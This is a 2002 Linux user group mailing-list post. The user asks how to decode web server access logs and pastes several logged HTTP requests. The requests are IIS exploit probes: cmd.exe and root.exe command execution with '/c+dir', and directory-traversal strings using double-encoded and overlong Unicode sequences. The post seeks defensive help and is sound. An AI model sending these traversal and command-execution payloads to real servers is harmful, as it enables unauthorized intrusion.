[TriLUG] deciphering access logs
Andy Naylor
anaylor at nc.rr.com
Thu Jan 3 19:07:51 EST 2002
Could anyone point me to some help on decoding access logs?
I've been getting this and others like them recently. I'd hate to have a
script kiddy. But I probably do.
Thanks,
Andy...
<snip>
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:04 -0500]
"GET/MSADC/root.exe?/c+dir HTTP/1.0" 404 314 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:05 -0500] "GET
/c/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 324 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:05 -0500] "GET
/d/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 324 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:05 -0500] "GET
/scripts/..%255c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET
/_vti_bin/..%255c../..%255
c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET
/_mem_bin/..%255c../..%255
c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET
/msadc/..%255c../..%255c..
/..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 371 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET
/scripts/..%c1%1c../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
24.49.205.137 - - [01/Jan/2002:12:26:06 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+di
r HTTP/1.0" 404 337 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:07 -0500] "GET
/scripts/..%c0%af../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
@
More information about the TriLUG
mailing list